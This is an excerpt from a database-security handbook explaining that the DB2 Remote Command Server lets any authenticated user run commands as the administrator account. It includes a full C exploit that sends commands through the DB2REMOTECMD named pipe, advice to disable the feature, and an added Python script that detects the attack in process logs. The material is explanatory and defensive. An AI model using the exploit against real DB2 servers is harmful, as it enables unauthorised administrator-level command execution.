DB2 Remote Command Server

The DB2 Remote Command Server exists to ease administration of the DB2 server by allowing users to run arbitrary commands on the remote server. Although the Remote Command Server was intended to let administrators run commands, commands can be run by any user, provided of course they have a user ID and password. While it is considered bad to allow everyone and their dog to run commands remotely, what exacerbates the problem is that the command runs with the privileges of the user account running the Remote Command Server. On Windows, for example, this is db2admin, which is an administrator. What this means is that a low-privileged guest account can run OS commands with administrator-level privileges.

/* DB2 Remote Command Server Exploit

   DB2RCMD.EXE listens on a named pipe DB2REMOTECMD and executes commands
   sent through it. When a connection is made to the pipe a new process is
   created, namely db2rcmdc.exe, and this executes the command.
*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{
    char buffer[540] = "";
    char NamedPipe[260] = "\\\\";   /* UNC prefix; becomes \\target\pipe\DB2REMOTECMD */
    HANDLE rcmd = NULL;
    char *ptr = NULL;
    int len = 0;
    DWORD Bytes = 0;

    if (argc != 3)
    {
        printf("\n\tDB2 Remote Command Exploit.\n\n");
        printf("\tUsage: db2rmtcmd target \"command\"\n");
        printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th September 2003\n");
        return 0;
    }

    strncat(NamedPipe, argv[1], 200);
    strcat(NamedPipe, "\\pipe\\DB2REMOTECMD");

    // Setup handshake message: type byte, "DB2" marker, command length at offset 532
    ZeroMemory(buffer, 540);
    buffer[0] = 0x01;
    ptr = &buffer[4];
    strcpy(ptr, "DB2");
    len = strlen(argv[2]);
    buffer[532] = (char)len;

    // Open the named pipe
    rcmd = CreateFile(NamedPipe, GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (rcmd == INVALID_HANDLE_VALUE)
        return printf("Failed to open pipe %s. Error %lu.\n", NamedPipe, GetLastError());

    // Send handshake
    len = WriteFile(rcmd, buffer, 536, &Bytes, NULL);
    if (!len)
        return printf("Failed to write to %s. Error %lu.\n", NamedPipe, GetLastError());

    ZeroMemory(buffer, 540);
    strncpy(buffer, argv[2], 254);

    // Send command
    len = WriteFile(rcmd, buffer, strlen(buffer), &Bytes, NULL);
    if (!len)
        return printf("Failed to write to %s. Error %lu.\n", NamedPipe, GetLastError());

    // Read results until the server closes the pipe
    while (len)
    {
        len = ReadFile(rcmd, buffer, 530, &Bytes, NULL);
        printf("%s", buffer);
        ZeroMemory(buffer, 540);
    }

    return 0;
}

Allowing users to run commands remotely is dangerous, especially when those commands execute with administrator privileges. As such this feature should not be used. Turning off the Remote Command Server will help secure the DB2 installation.
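The process chain the exploit comment describes (a pipe connection causes DB2RCMD.EXE to spawn db2rcmdc.exe, which runs the command as the service account) is also what a defender can look for while the feature is still enabled. The following detection is an added example and is not from the book: it scans constructed Sysmon-style process-creation records (Event ID 1 field names such as Image, ParentImage, CommandLine and User; host name, paths, times and commands are invented) and raises an alert for every db2rcmdc.exe spawned by db2rcmd.exe, noting when the child ran as db2admin.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 1 (process creation) style records.  Field names
# follow Sysmon's schema; the host name, paths, timestamps and commands are
# invented for this example.
SAMPLE_EVENTS = [
    'UtcTime=2003-09-06T10:00:01 '
    'Image="C:\\Program Files\\IBM\\SQLLIB\\BIN\\db2rcmdc.exe" '
    'CommandLine="db2rcmdc.exe whoami" User=DB2HOST\\db2admin '
    'ParentImage="C:\\Program Files\\IBM\\SQLLIB\\BIN\\db2rcmd.exe"',
    'UtcTime=2003-09-06T10:00:05 Image="C:\\Windows\\notepad.exe" '
    'CommandLine="notepad.exe" User=DB2HOST\\alice '
    'ParentImage="C:\\Windows\\explorer.exe"',
    'UtcTime=2003-09-06T10:01:12 '
    'Image="C:\\Program Files\\IBM\\SQLLIB\\BIN\\db2rcmdc.exe" '
    'CommandLine="db2rcmdc.exe ipconfig /all" User=DB2HOST\\db2admin '
    'ParentImage="C:\\Program Files\\IBM\\SQLLIB\\BIN\\db2rcmd.exe"',
]

# key=value pairs; values containing spaces are double-quoted.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Process names from the page: the pipe listener and the per-command child.
SERVER_IMAGE = "db2rcmd.exe"
CHILD_IMAGE = "db2rcmdc.exe"
# Service account the page names for Windows installations.
SERVICE_ACCOUNT = "db2admin"


def parse_event(line: str) -> Dict[str, str]:
    """Turn one Sysmon-style record into a field dictionary."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_remote_command(event: Dict[str, str]) -> bool:
    """True when db2rcmd.exe spawned db2rcmdc.exe, i.e. a command arrived on the pipe."""
    return (basename(event.get("Image", "")) == CHILD_IMAGE
            and basename(event.get("ParentImage", "")) == SERVER_IMAGE)


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Return one alert per remote command execution found in the records."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if not is_remote_command(event):
            continue
        user = event.get("User", "")
        alerts.append({
            "time": event.get("UtcTime", ""),
            "user": user,
            "command": event.get("CommandLine", ""),
            # The child inherits the service account, so the command runs
            # with that account's rights regardless of who sent it.
            "runs_as_service_account": user.split("\\")[-1].lower() == SERVICE_ACCOUNT,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['time']} {alert['user']} via DB2 Remote Command Server: "
              f"{alert['command']} (service account: {alert['runs_as_service_account']})")
```

Because db2rcmdc.exe is created only to run a command received on the pipe, the parent/child pairing alone is a high-confidence signal; on a host where the Remote Command Server has been turned off as recommended above, any such event means the feature has been re-enabled.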



The Database Hacker's Handbook: Defending Database Servers
ISBN: 0764578014
Year: 2003
Pages: 156